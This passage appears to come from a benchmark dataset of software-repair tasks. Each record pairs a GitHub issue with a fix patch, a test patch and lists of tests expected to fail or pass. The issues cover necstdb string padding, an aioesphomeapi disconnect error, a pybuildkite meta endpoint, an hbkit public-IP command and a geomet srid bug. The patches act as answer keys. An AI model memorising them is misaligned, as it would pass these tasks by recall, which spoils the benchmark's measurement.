+ def test_read_db_with_invalid_format_specifier(self):
+ db = necstdb.opendb(self.EXAMPLE_DATA_PATH)
_ = db.open_table("data4").read(astype="raw")
with pytest.raises(ValueError):
_ = db.open_table("data4").read(astype="tuple")
@@ -29,3 +36,26 @@ class TestReadDatabase:
print(actual)
actual = db.open_table("data4").recovered.read(astype="array")
print(actual)
+
+ def test_ignore_trailing_pad_bytes(self, db_path):
+ header = {
+ "data": [
+ {"key": "data", "format": "5s", "size": 5},
+ {"key": "bool", "format": "?", "size": 1},
+ ]
+ }
+
+ db = necstdb.opendb(db_path, mode="w")
+ db.create_table("string_length_missepecified", header)
+ table = db.open_table("string_length_missepecified", mode="ab")
+
+ data = b"abc"
+ _ = table.append(data, True)
+ table.close() # Close table to flush the data
+
+ table = db.open_table("string_length_missepecified").recovered
+ assert table.read(astype="raw")[:5] == data + b"\x00\x00" # Won't be recovered
+ assert table.read(astype="tuple")[0][0] == data
+ assert table.read(astype="dict")[0]["data"] == data
+ assert table.read(astype="df")["data"].values[0] == data
+ assert table.read(astype="sa")["data"][0] == data
|
Data type "|S12" is not unpacked when opening the db specifying astype="df"
Below works well
```python
>>>db = necstdb.opendb(data_path)
>>>obsmode = db.open_table("obsmode").read(astype="array")
```
However,
```python
>>>db = necstdb.opendb(data_path)
>>>obsmode = db.open_table("obsmode").read(astype="df")
>>>print(obsmode["obs_mode"])
b' \x00\x00'
```
pandas is very useful when manipulating time x 1-dimensional data.
Could you please fix the issue? @KaoruNishikawa
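
A minimal end-to-end sketch of the behaviour checked by the new `test_ignore_trailing_pad_bytes` test, using the same header and calls as the test patch and assuming the recovery logic from this patch is applied (the database path is a placeholder):

```python
import necstdb

header = {
    "data": [
        {"key": "data", "format": "5s", "size": 5},  # declared as 5 bytes
        {"key": "bool", "format": "?", "size": 1},
    ]
}

db = necstdb.opendb("/tmp/example_db", mode="w")
db.create_table("string_length_misspecified", header)
table = db.open_table("string_length_misspecified", mode="ab")
table.append(b"abc", True)  # only 3 bytes of real data for the 5s field
table.close()               # close to flush the data

# .recovered rewrites the header (5s -> 3s + 2x pad) so the trailing pad
# bytes are dropped and the string reads back as b"abc" instead of
# b"abc\x00\x00" for tuple/dict/df reads.
table = db.open_table("string_length_misspecified").recovered
print(table.read(astype="df")["data"].values[0])  # b"abc"
```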
|
0.0
|
fb254063d80c4f2a2c3047fe4a426e6de0ee6255
|
[
"tests/test_necstdb_recover.py::TestReadDatabase::test_ignore_trailing_pad_bytes"
] |
[
"tests/test_necstdb.py::TestWriteDatabase::test_create_table",
"tests/test_necstdb.py::TestWriteDatabase::test_write_table",
"tests/test_necstdb.py::TestWriteDatabase::test_write_file",
"tests/test_necstdb.py::TestReadDatabase::test_read_types",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_tuple",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_dict",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_df",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_array",
"tests/test_necstdb.py::TestReadDatabase::test_read_as_bytes",
"tests/test_necstdb.py::TestReadDatabase::test_read_file",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_tuple",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_dict",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_df",
"tests/test_necstdb.py::TestPartialRead::test_partial_read_as_bytes",
"tests/test_necstdb.py::TestMethods::test_list_tables",
"tests/test_necstdb.py::TestMethods::test_checkout",
"tests/test_necstdb.py::TestMethods::test_get_info",
"tests/test_necstdb_recover.py::TestReadDatabase::test_read_db_with_invalid_format_specifier"
] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-10-18 14:35:53+00:00
|
mit
| 4,343
|
|
esphome__aioesphomeapi-840
|
diff --git a/aioesphomeapi/client.py b/aioesphomeapi/client.py
index 63d23c5..dcb82df 100644
--- a/aioesphomeapi/client.py
+++ b/aioesphomeapi/client.py
@@ -928,6 +928,7 @@ class APIClient:
tilt: float | None = None,
stop: bool = False,
) -> None:
+ connection = self._get_connection()
req = CoverCommandRequest(key=key)
apiv = self.api_version
if TYPE_CHECKING:
@@ -951,7 +952,7 @@ class APIClient:
elif position == 0.0:
req.legacy_command = LegacyCoverCommand.CLOSE
req.has_legacy_command = True
- self._get_connection().send_message(req)
+ connection.send_message(req)
def fan_command(
self,
@@ -1058,6 +1059,7 @@ class APIClient:
custom_preset: str | None = None,
target_humidity: float | None = None,
) -> None:
+ connection = self._get_connection()
req = ClimateCommandRequest(key=key)
if mode is not None:
req.has_mode = True
@@ -1096,7 +1098,7 @@ class APIClient:
if target_humidity is not None:
req.has_target_humidity = True
req.target_humidity = target_humidity
- self._get_connection().send_message(req)
+ connection.send_message(req)
def number_command(self, key: int, state: float) -> None:
self._get_connection().send_message(NumberCommandRequest(key=key, state=state))
@@ -1172,6 +1174,7 @@ class APIClient:
def execute_service(
self, service: UserService, data: ExecuteServiceDataType
) -> None:
+ connection = self._get_connection()
req = ExecuteServiceRequest(key=service.key)
args = []
apiv = self.api_version
@@ -1196,7 +1199,7 @@ class APIClient:
# pylint: disable=no-member
req.args.extend(args)
- self._get_connection().send_message(req)
+ connection.send_message(req)
def _request_image(self, *, single: bool = False, stream: bool = False) -> None:
self._get_connection().send_message(
|
esphome/aioesphomeapi
|
a3009097a8cec6132f70c9790a38b19b16348c05
|
diff --git a/tests/test_client.py b/tests/test_client.py
index 2c290e5..b8b41fb 100644
--- a/tests/test_client.py
+++ b/tests/test_client.py
@@ -2280,3 +2280,55 @@ async def test_api_version_after_connection_closed(
assert client.api_version == APIVersion(1, 9)
await client.disconnect(force=True)
assert client.api_version is None
+
+
+@pytest.mark.asyncio
+async def test_calls_after_connection_closed(
+ api_client: tuple[
+ APIClient, APIConnection, asyncio.Transport, APIPlaintextFrameHelper
+ ],
+) -> None:
+ """Test calls after connection close should raise APIConnectionError."""
+ client, connection, transport, protocol = api_client
+ assert client.api_version == APIVersion(1, 9)
+ await client.disconnect(force=True)
+ assert client.api_version is None
+ service = UserService(
+ name="my_service",
+ key=1,
+ args=[],
+ )
+ with pytest.raises(APIConnectionError):
+ client.execute_service(service, {})
+ for method in (
+ client.button_command,
+ client.climate_command,
+ client.cover_command,
+ client.fan_command,
+ client.light_command,
+ client.media_player_command,
+ client.siren_command,
+ ):
+ with pytest.raises(APIConnectionError):
+ await method(1)
+
+ with pytest.raises(APIConnectionError):
+ await client.alarm_control_panel_command(1, AlarmControlPanelCommand.ARM_HOME)
+
+ with pytest.raises(APIConnectionError):
+ await client.date_command(1, 1, 1, 1)
+
+ with pytest.raises(APIConnectionError):
+ await client.lock_command(1, LockCommand.LOCK)
+
+ with pytest.raises(APIConnectionError):
+ await client.number_command(1, 1)
+
+ with pytest.raises(APIConnectionError):
+ await client.select_command(1, "1")
+
+ with pytest.raises(APIConnectionError):
+ await client.switch_command(1, True)
+
+ with pytest.raises(APIConnectionError):
+ await client.text_command(1, "1")
|
thousands of error entries in homeassistant
Not sure what other details you need. Please ask and I will provide.
Noticed MANY of these entries.
Using latest ESPHome and HA versions.
```
File "/usr/src/homeassistant/homeassistant/components/esphome/manager.py", line 695, in execute_service
entry_data.client.execute_service(service, call.data)
File "/usr/local/lib/python3.12/site-packages/aioesphomeapi/client.py", line 1183, in execute_service
int_type = "int_" if apiv >= APIVersion(1, 3) else "legacy_int"
^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: '>=' not supported between instances of 'NoneType' and 'APIVersion'
```
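
The patch resolves the connection before building the request, so a closed connection raises `APIConnectionError` up front instead of the `TypeError` above. A simplified, self-contained sketch of that ordering (the class, exception, and request shape here are stand-ins, not the real aioesphomeapi types):

```python
class APIConnectionError(Exception):
    pass

class Client:
    def __init__(self):
        self._connection = None   # closed / never connected
        self.api_version = None   # None once the connection is gone

    def _get_connection(self):
        if self._connection is None:
            raise APIConnectionError("Not connected!")
        return self._connection

    def execute_service(self, key):
        # New order: fail fast with APIConnectionError; the old order built
        # the request and compared self.api_version first, which blew up with
        # a TypeError when api_version was None.
        connection = self._get_connection()
        request = {"key": key, "api_version": self.api_version}
        connection.send_message(request)

client = Client()
try:
    client.execute_service(1)
except APIConnectionError as err:
    print(err)  # Not connected!
```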
|
0.0
|
a3009097a8cec6132f70c9790a38b19b16348c05
|
[
"tests/test_client.py::test_calls_after_connection_closed"
] |
[
"tests/test_client.py::test_expected_name",
"tests/test_client.py::test_connect_backwards_compat",
"tests/test_client.py::test_finish_connection_wraps_exceptions_as_unhandled_api_error",
"tests/test_client.py::test_connection_released_if_connecting_is_cancelled",
"tests/test_client.py::test_request_while_handshaking",
"tests/test_client.py::test_connect_while_already_connected",
"tests/test_client.py::test_list_entities[input0-output0]",
"tests/test_client.py::test_list_entities[input1-output1]",
"tests/test_client.py::test_subscribe_states",
"tests/test_client.py::test_subscribe_states_camera",
"tests/test_client.py::test_cover_command_legacy[cmd0-req0]",
"tests/test_client.py::test_cover_command_legacy[cmd1-req1]",
"tests/test_client.py::test_cover_command_legacy[cmd2-req2]",
"tests/test_client.py::test_cover_command_legacy[cmd3-req3]",
"tests/test_client.py::test_cover_command[cmd0-req0]",
"tests/test_client.py::test_cover_command[cmd1-req1]",
"tests/test_client.py::test_cover_command[cmd2-req2]",
"tests/test_client.py::test_cover_command[cmd3-req3]",
"tests/test_client.py::test_cover_command[cmd4-req4]",
"tests/test_client.py::test_fan_command[cmd0-req0]",
"tests/test_client.py::test_fan_command[cmd1-req1]",
"tests/test_client.py::test_fan_command[cmd2-req2]",
"tests/test_client.py::test_fan_command[cmd3-req3]",
"tests/test_client.py::test_fan_command[cmd4-req4]",
"tests/test_client.py::test_fan_command[cmd5-req5]",
"tests/test_client.py::test_fan_command[cmd6-req6]",
"tests/test_client.py::test_light_command[cmd0-req0]",
"tests/test_client.py::test_light_command[cmd1-req1]",
"tests/test_client.py::test_light_command[cmd2-req2]",
"tests/test_client.py::test_light_command[cmd3-req3]",
"tests/test_client.py::test_light_command[cmd4-req4]",
"tests/test_client.py::test_light_command[cmd5-req5]",
"tests/test_client.py::test_light_command[cmd6-req6]",
"tests/test_client.py::test_light_command[cmd7-req7]",
"tests/test_client.py::test_light_command[cmd8-req8]",
"tests/test_client.py::test_light_command[cmd9-req9]",
"tests/test_client.py::test_light_command[cmd10-req10]",
"tests/test_client.py::test_light_command[cmd11-req11]",
"tests/test_client.py::test_switch_command[cmd0-req0]",
"tests/test_client.py::test_switch_command[cmd1-req1]",
"tests/test_client.py::test_climate_command_legacy[cmd0-req0]",
"tests/test_client.py::test_climate_command_legacy[cmd1-req1]",
"tests/test_client.py::test_climate_command[cmd0-req0]",
"tests/test_client.py::test_climate_command[cmd1-req1]",
"tests/test_client.py::test_climate_command[cmd2-req2]",
"tests/test_client.py::test_climate_command[cmd3-req3]",
"tests/test_client.py::test_climate_command[cmd4-req4]",
"tests/test_client.py::test_climate_command[cmd5-req5]",
"tests/test_client.py::test_climate_command[cmd6-req6]",
"tests/test_client.py::test_climate_command[cmd7-req7]",
"tests/test_client.py::test_climate_command[cmd8-req8]",
"tests/test_client.py::test_climate_command[cmd9-req9]",
"tests/test_client.py::test_number_command[cmd0-req0]",
"tests/test_client.py::test_number_command[cmd1-req1]",
"tests/test_client.py::test_date_command[cmd0-req0]",
"tests/test_client.py::test_date_command[cmd1-req1]",
"tests/test_client.py::test_lock_command[cmd0-req0]",
"tests/test_client.py::test_lock_command[cmd1-req1]",
"tests/test_client.py::test_lock_command[cmd2-req2]",
"tests/test_client.py::test_lock_command[cmd3-req3]",
"tests/test_client.py::test_select_command[cmd0-req0]",
"tests/test_client.py::test_select_command[cmd1-req1]",
"tests/test_client.py::test_media_player_command[cmd0-req0]",
"tests/test_client.py::test_media_player_command[cmd1-req1]",
"tests/test_client.py::test_media_player_command[cmd2-req2]",
"tests/test_client.py::test_button_command[cmd0-req0]",
"tests/test_client.py::test_siren_command[cmd0-req0]",
"tests/test_client.py::test_siren_command[cmd1-req1]",
"tests/test_client.py::test_siren_command[cmd2-req2]",
"tests/test_client.py::test_siren_command[cmd3-req3]",
"tests/test_client.py::test_siren_command[cmd4-req4]",
"tests/test_client.py::test_siren_command[cmd5-req5]",
"tests/test_client.py::test_siren_command[cmd6-req6]",
"tests/test_client.py::test_execute_service",
"tests/test_client.py::test_request_single_image",
"tests/test_client.py::test_request_image_stream",
"tests/test_client.py::test_alarm_panel_command[cmd0-req0]",
"tests/test_client.py::test_alarm_panel_command[cmd1-req1]",
"tests/test_client.py::test_alarm_panel_command[cmd2-req2]",
"tests/test_client.py::test_text_command[cmd0-req0]",
"tests/test_client.py::test_text_command[cmd1-req1]",
"tests/test_client.py::test_noise_psk_handles_subclassed_string",
"tests/test_client.py::test_no_noise_psk",
"tests/test_client.py::test_empty_noise_psk_or_expected_name",
"tests/test_client.py::test_bluetooth_disconnect",
"tests/test_client.py::test_bluetooth_pair",
"tests/test_client.py::test_bluetooth_pair_connection_drops",
"tests/test_client.py::test_bluetooth_unpair_connection_drops",
"tests/test_client.py::test_bluetooth_clear_cache_connection_drops",
"tests/test_client.py::test_bluetooth_unpair",
"tests/test_client.py::test_bluetooth_clear_cache",
"tests/test_client.py::test_device_info",
"tests/test_client.py::test_bluetooth_gatt_read",
"tests/test_client.py::test_bluetooth_gatt_read_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_read_error",
"tests/test_client.py::test_bluetooth_gatt_read_descriptor",
"tests/test_client.py::test_bluetooth_gatt_write",
"tests/test_client.py::test_bluetooth_gatt_write_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_write_without_response",
"tests/test_client.py::test_bluetooth_gatt_write_descriptor",
"tests/test_client.py::test_bluetooth_gatt_write_descriptor_without_response",
"tests/test_client.py::test_bluetooth_gatt_get_services_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_get_services",
"tests/test_client.py::test_bluetooth_gatt_get_services_errors",
"tests/test_client.py::test_bluetooth_gatt_start_notify_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_start_notify",
"tests/test_client.py::test_bluetooth_gatt_start_notify_fails",
"tests/test_client.py::test_subscribe_bluetooth_le_advertisements",
"tests/test_client.py::test_subscribe_bluetooth_le_raw_advertisements",
"tests/test_client.py::test_subscribe_bluetooth_connections_free",
"tests/test_client.py::test_subscribe_home_assistant_states",
"tests/test_client.py::test_subscribe_logs",
"tests/test_client.py::test_send_home_assistant_state",
"tests/test_client.py::test_subscribe_service_calls",
"tests/test_client.py::test_set_debug",
"tests/test_client.py::test_force_disconnect",
"tests/test_client.py::test_bluetooth_device_connect[False-BluetoothProxyFeature.0-BluetoothDeviceRequestType.CONNECT]",
"tests/test_client.py::test_bluetooth_device_connect[False-BluetoothProxyFeature.REMOTE_CACHING-BluetoothDeviceRequestType.CONNECT_V3_WITHOUT_CACHE]",
"tests/test_client.py::test_bluetooth_device_connect[True-BluetoothProxyFeature.REMOTE_CACHING-BluetoothDeviceRequestType.CONNECT_V3_WITH_CACHE]",
"tests/test_client.py::test_bluetooth_device_connect_and_disconnect_times_out",
"tests/test_client.py::test_bluetooth_device_connect_times_out_disconnect_ok",
"tests/test_client.py::test_bluetooth_device_connect_cancelled",
"tests/test_client.py::test_send_voice_assistant_event",
"tests/test_client.py::test_subscribe_voice_assistant",
"tests/test_client.py::test_subscribe_voice_assistant_failure",
"tests/test_client.py::test_subscribe_voice_assistant_cancels_long_running_handle_start",
"tests/test_client.py::test_api_version_after_connection_closed"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-03-10 19:21:14+00:00
|
mit
| 2,194
|
|
pyasi__pybuildkite-70
|
diff --git a/pybuildkite/buildkite.py b/pybuildkite/buildkite.py
index c89d8bd..1fd44b1 100644
--- a/pybuildkite/buildkite.py
+++ b/pybuildkite/buildkite.py
@@ -9,6 +9,7 @@ from pybuildkite.annotations import Annotations
from pybuildkite.artifacts import Artifacts
from pybuildkite.teams import Teams
from pybuildkite.users import Users
+from pybuildkite.meta import Meta
from pybuildkite.decorators import requires_token
@@ -110,3 +111,11 @@ class Buildkite(object):
Get User operations for the Buildkite API
"""
return Users(self.client, self.base_url)
+
+ def meta(self):
+ """
+ Get Meta operations for the Buildkite API
+
+ :return: Client
+ """
+ return Meta(self.client, self.base_url)
diff --git a/pybuildkite/meta.py b/pybuildkite/meta.py
new file mode 100644
index 0000000..10f7333
--- /dev/null
+++ b/pybuildkite/meta.py
@@ -0,0 +1,27 @@
+from posixpath import join as urljoin
+
+from pybuildkite.client import Client
+
+
+class Meta(Client):
+ """
+ Meta operations for the Buildkite API
+ """
+
+ def __init__(self, client, base_url):
+ """
+ Construct the class
+
+ :param client: API Client
+ :param base_url: Base Url
+ """
+ self.client = client
+ self.path = urljoin(base_url, "meta")
+
+ def get_meta_information(self):
+ """
+ Returns meta information
+
+ :return: Returns meta information
+ """
+ return self.client.get(self.path)
diff --git a/requirements.txt b/requirements.txt
index 0fda20c..b64cfd9 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -2,7 +2,7 @@ mock==3.0.5
coveralls==2.0.0
pytest==5.2.1
pytest-cov==2.8.1
-requests==2.22.0
+requests==2.26.0
urllib3==1.26.5
black==19.3b0
typing-extensions==3.7.4.2
|
pyasi/pybuildkite
|
fa356015ec0780a4fbd4cfa7f9c63f01590301b8
|
diff --git a/tests/test_buildkite.py b/tests/test_buildkite.py
index 5bb9d1a..6f5e1db 100644
--- a/tests/test_buildkite.py
+++ b/tests/test_buildkite.py
@@ -11,6 +11,7 @@ from pybuildkite.buildkite import (
Teams,
Users,
Organizations,
+ Meta,
)
from pybuildkite.exceptions import NoAcccessTokenException
@@ -46,6 +47,7 @@ def test_access_token_set():
(Buildkite().users, Users),
(Buildkite().annotations, Annotations),
(Buildkite().organizations, Organizations),
+ (Buildkite().meta, Meta),
],
)
def test_eval(function, expected_type):
diff --git a/tests/test_meta.py b/tests/test_meta.py
new file mode 100644
index 0000000..fff0d8c
--- /dev/null
+++ b/tests/test_meta.py
@@ -0,0 +1,10 @@
+from pybuildkite.meta import Meta
+
+
+def test_get_meta_information(fake_client):
+ """
+ Test get user
+ """
+ meta = Meta(fake_client, "https://api.buildkite.com/v2/")
+ meta.get_meta_information()
+ fake_client.get.assert_called_with(meta.path)
diff --git a/tests/test_pipelines.py b/tests/test_pipelines.py
index 4e55fab..c4126de 100644
--- a/tests/test_pipelines.py
+++ b/tests/test_pipelines.py
@@ -51,6 +51,7 @@ def test_create_pipeline(fake_client):
"command": "buildkite-agent pipeline upload",
}
],
+ "team_uuids": None,
}
)
@@ -86,6 +87,7 @@ def test_create_yaml_pipeline(fake_client):
"name": "test_pipeline",
"repository": "my_repo",
"configuration": "steps:\n - command: ls",
+ "team_uuids": None,
},
)
|
Create functionality for the 'meta' endpoint
Create a new file and class to incorporate the [meta API](https://buildkite.com/docs/apis/rest-api/meta).
- Create a new file called `meta.py`
- Create a class called Meta
- Return the Meta class from a method in [buildkite.py](https://github.com/pyasi/pybuildkite/blob/master/pybuildkite/buildkite.py)
- Write unit tests for the new code
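For illustration, a minimal usage sketch of the wrapper added by the patch above; the token value is a placeholder and `set_access_token` is assumed to behave as in the existing pybuildkite client:
```python
from pybuildkite.buildkite import Buildkite

buildkite = Buildkite()
buildkite.set_access_token("YOUR_API_ACCESS_TOKEN")  # placeholder token

# Issues GET https://api.buildkite.com/v2/meta via the new Meta class
meta_info = buildkite.meta().get_meta_information()
print(meta_info)
```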
|
0.0
|
fa356015ec0780a4fbd4cfa7f9c63f01590301b8
|
[
"tests/test_buildkite.py::test_access_token_not_set_raises_exception",
"tests/test_buildkite.py::test_access_token_set",
"tests/test_buildkite.py::test_eval[wrapper-Pipelines]",
"tests/test_buildkite.py::test_eval[wrapper-Builds]",
"tests/test_buildkite.py::test_eval[wrapper-Jobs]",
"tests/test_buildkite.py::test_eval[wrapper-Agents]",
"tests/test_buildkite.py::test_eval[wrapper-Emojis]",
"tests/test_buildkite.py::test_eval[wrapper-Artifacts]",
"tests/test_buildkite.py::test_eval[wrapper-Teams]",
"tests/test_buildkite.py::test_eval[wrapper-Users]",
"tests/test_buildkite.py::test_eval[wrapper-Annotations]",
"tests/test_buildkite.py::test_eval[wrapper-Organizations]",
"tests/test_buildkite.py::test_eval[meta-Meta]",
"tests/test_meta.py::test_get_meta_information",
"tests/test_pipelines.py::test_Pipelines",
"tests/test_pipelines.py::test_list_pipelines",
"tests/test_pipelines.py::test_get_pipeline",
"tests/test_pipelines.py::test_create_pipeline",
"tests/test_pipelines.py::test_create_pipeline_with_teams",
"tests/test_pipelines.py::test_create_yaml_pipeline",
"tests/test_pipelines.py::test_create_yaml_pipeline_with_teams",
"tests/test_pipelines.py::test_delete_pipeline",
"tests/test_pipelines.py::test_update_pipeline",
"tests/test_pipelines.py::test_update_pipeline_configuration_and_steps"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_added_files",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-10-02 00:50:01+00:00
|
bsd-2-clause
| 4,705
|
|
graycarl__hbkit-22
|
diff --git a/hbkit/__init__.py b/hbkit/__init__.py
index 78596de..4d9613b 100644
--- a/hbkit/__init__.py
+++ b/hbkit/__init__.py
@@ -1,7 +1,7 @@
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import click
-from . import core, random, short, watch, git, backup, pi, time, config
+from . import core, random, short, watch, git, backup, pi, time, config, ip
__version__ = '0.6.0'
@@ -33,3 +33,4 @@ cli.add_command(backup.cli, 'backup')
cli.add_command(pi.cli, 'pi')
cli.add_command(time.cli, 'time')
cli.add_command(config.cli, 'config')
+cli.add_command(ip.cli, 'ip')
diff --git a/hbkit/ip.py b/hbkit/ip.py
new file mode 100644
index 0000000..e3b846a
--- /dev/null
+++ b/hbkit/ip.py
@@ -0,0 +1,45 @@
+# -*- coding: utf-8 -*-
+from __future__ import absolute_import
+from builtins import * # noqa
+import click
+import requests
+
+
+SERVICES = {
+ 'httpbin': {
+ 'url': 'https://httpbin.org/ip',
+ 'response': lambda data: data['origin']
+ },
+ 'ipify': {
+ 'url': 'https://api.ipify.org',
+ 'params': {
+ 'format': 'json'
+ },
+ 'response': lambda data: data['ip']
+ }
+}
+
+
+@click.group('ip')
+def cli():
+ """Tools about ip address."""
+
+
+@cli.command('get-public')
+@click.option('--timeout', default=5.0, help='Timeout for network requests.')
+def cli_get_public(timeout):
+ """Get current public IP."""
+ for name in ('ipify', 'httpbin'):
+ service = SERVICES[name]
+ try:
+ response = requests.get(service['url'],
+ params=service.get('params'),
+ timeout=timeout)
+ response.raise_for_status()
+ ip = service['response'](response.json())
+ break
+ except requests.exceptions.RequestException:
+ continue
+ else:
+ raise click.ClickException('Can not get public IP')
+ click.echo(ip)
diff --git a/hbkit/lib.py b/hbkit/lib.py
index bee5361..3327846 100644
--- a/hbkit/lib.py
+++ b/hbkit/lib.py
@@ -101,7 +101,9 @@ class ConfigManager(object):
def save_to_file(self):
try:
configfile = open(self.path, 'w')
- except FileNotFoundError:
+ # 暂时没法使用 Python3 的 FileNotFoundError,因为 Python2 没有这个定义
+ # 且 Python-Future 暂时没有对它进行兼容。
+ except IOError:
os.makedirs(os.path.dirname(self.path))
configfile = open(self.path, 'w')
with configfile:
|
graycarl/hbkit
|
52e10591b3db82364ded1bfe3829b4293beedf60
|
diff --git a/tests/test_ip.py b/tests/test_ip.py
new file mode 100644
index 0000000..8040ee2
--- /dev/null
+++ b/tests/test_ip.py
@@ -0,0 +1,52 @@
+# -*- coding: utf-8 -*-
+from __future__ import absolute_import
+from builtins import * # noqa
+import requests
+from hbkit import ip
+
+
+class MockGet(object):
+
+ class FakeResponse(object):
+ def __init__(self, json):
+ self._json = json
+
+ def raise_for_status(self):
+ pass
+
+ def json(self):
+ return self._json
+
+ def __init__(self, responses):
+ self.responses = responses
+
+ def __call__(self, url, params, **kwargs):
+ resp = self.responses[url]
+ if isinstance(resp, Exception):
+ raise resp
+ return self.FakeResponse(resp)
+
+
+def test_get_public(runner, monkeypatch):
+ mock_get = MockGet({
+ 'https://httpbin.org/ip': {
+ 'origin': 'ip from httpbin',
+ },
+ 'https://api.ipify.org': {
+ 'ip': 'ip from ipify',
+ }
+ })
+ monkeypatch.setattr(requests, 'get', mock_get)
+ # normal case
+ result = runner.invoke(ip.cli_get_public).output.strip()
+ assert result == 'ip from ipify'
+
+ # ipify failed case
+ mock_get.responses['https://api.ipify.org'] = requests.Timeout()
+ result = runner.invoke(ip.cli_get_public).output.strip()
+ assert result == 'ip from httpbin'
+
+ # both failed case
+ mock_get.responses['https://httpbin.org/ip'] = requests.Timeout()
+ result = runner.invoke(ip.cli_get_public).output.strip()
+ assert 'Can not get public IP' in result
|
Get current public IP
Sample:
```
$ hbkit ip get-public
202.111.111.111
```
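A rough sketch of the fallback behaviour the patch above implements (the service URLs are the ones hard-coded in `hbkit/ip.py`; error handling is simplified):
```python
import requests

# Try ipify first, then fall back to httpbin; give up if both fail.
services = [
    ("https://api.ipify.org", {"format": "json"}, lambda data: data["ip"]),
    ("https://httpbin.org/ip", None, lambda data: data["origin"]),
]
for url, params, extract in services:
    try:
        response = requests.get(url, params=params, timeout=5.0)
        response.raise_for_status()
        print(extract(response.json()))
        break
    except requests.exceptions.RequestException:
        continue
else:
    raise SystemExit("Can not get public IP")
```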
|
0.0
|
52e10591b3db82364ded1bfe3829b4293beedf60
|
[
"tests/test_ip.py::test_get_public"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-08-06 06:40:06+00:00
|
mit
| 2,676
|
|
geomet__geomet-101
|
diff --git a/geomet/esri.py b/geomet/esri.py
index e68772d..1000243 100644
--- a/geomet/esri.py
+++ b/geomet/esri.py
@@ -111,7 +111,8 @@ def _dump_geojson_point(obj, srid=None):
"""
coordkey = "coordinates"
coords = obj[coordkey]
- srid = _extract_geojson_srid(obj) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(obj)
return {"x": coords[0], "y": coords[1], "spatialReference": {"wkid": srid}}
@@ -121,7 +122,8 @@ def _dump_geojson_multipoint(obj, srid=None):
"""
coordkey = "coordinates"
- srid = _extract_geojson_srid(obj) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(obj)
return {"points": obj[coordkey], "spatialReference": {"wkid": srid}}
@@ -136,7 +138,8 @@ def _dump_geojson_polyline(obj, srid=None):
coordinates = [obj[coordkey]]
else:
coordinates = obj[coordkey]
- srid = _extract_geojson_srid(obj) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(obj)
return {"paths": coordinates, "spatialReference": {"wkid": srid}}
@@ -157,7 +160,8 @@ def _dump_geojson_polygon(data, srid=None):
else:
for seg in part:
part_list.append([list(coord) for coord in seg])
- srid = _extract_geojson_srid(data) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(data)
return {"rings": part_list, "spatialReference": {"wkid": srid}}
|
geomet/geomet
|
f4def96884c3c5f36fc9be98bc5e351e4aa5a3a6
|
diff --git a/geomet/tests/esri_test.py b/geomet/tests/esri_test.py
index 10a7735..612c6e6 100644
--- a/geomet/tests/esri_test.py
+++ b/geomet/tests/esri_test.py
@@ -28,6 +28,13 @@ esri_json_mpt = {
],
"spatialReference": {"wkid": 4326}
}
+esri_json_mpt_srid_26955 = {
+ "points": [
+ [-97.06138, 32.837], [-97.06133, 32.836],
+ [-97.06124, 32.834], [-97.06127, 32.832],
+ ],
+ "spatialReference": {"wkid": 26955}
+}
esri_json_polylines = {
"paths": [
[[-97.06138, 32.837], [-97.06133, 32.836],
@@ -361,5 +368,38 @@ class TestGeoJSONtoEsriJSON(unittest.TestCase):
self.assertEqual(expected, actual)
+class TestGeoJSONtoEsriJSONCustomSRID(unittest.TestCase):
+ """Tests to convert GeoJSON to EsriJSON, with custom SRIDs.
+
+ Proof for https://github.com/geomet/geomet/issues/99.
+ """
+ def test_dumps_to_esrijson_point_custom_srid(self):
+ self.assertEqual(
+ esri.dumps(gj_pt, srid=2062), {
+ 'spatialReference': {
+ 'wkid': 2062}, 'x': 25282, 'y': 43770})
+
+ def test_dumps_to_esrijson_multipoint_custom_srid(self):
+ self.assertEqual(
+ esri.dumps(gj_multi_pt, srid=26955),
+ esri_json_mpt_srid_26955,
+ )
+
+ def test_dumps_to_esrijson_polyline_custom_srid(self):
+ self.assertEqual(
+ esri.dumps(gj_lintstring, srid=3572),
+ {
+ 'paths': [[[100.0, 100.0], [5.0, 5.0]]],
+ 'spatialReference': {'wkid': 3572},
+ }
+ )
+
+ def test_dumps_to_esrijson_polygon_custom_srid(self):
+ vcheck = {'rings': [[[100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [
+ 100.0, 1.0], [100.0, 0.0]]], 'spatialReference': {'wkid': 2263}}
+ self.assertEqual(esri.dumps(gj_polygon, srid=2263),
+ vcheck)
+
+
if __name__ == "__main__":
unittest.main()
|
srid option for geomet.esri.dumps does not do anything
The option for defining output srid for the esrijson geometry is actively ignored
I have installed version 1.0.0
```python
import geomet.esri
from pprint import pprint
input_geojson = {'coordinates': [494252.595744681, 7066045.31914894], 'type': 'Point'}
esri_json = geomet.esri.dumps(input_geojson, srid=32632)
pprint(esri_json)
# Expected output is
# {'spatialReference': {'wkid': 32632},
# 'x': 494252.595744681,
# 'y': 7066045.31914894}
# Actual output is
# {'spatialReference': {'wkid': 4326},
# 'x': 494252.595744681,
# 'y': 7066045.31914894}
```
I did some investigating in the source code and found that all the `_dump_*` functions in the `esri.py` file include this line:
```python
srid = _extract_geojson_srid(obj) or srid
```
And inside the `_extract_geojson_srid` function:
```python
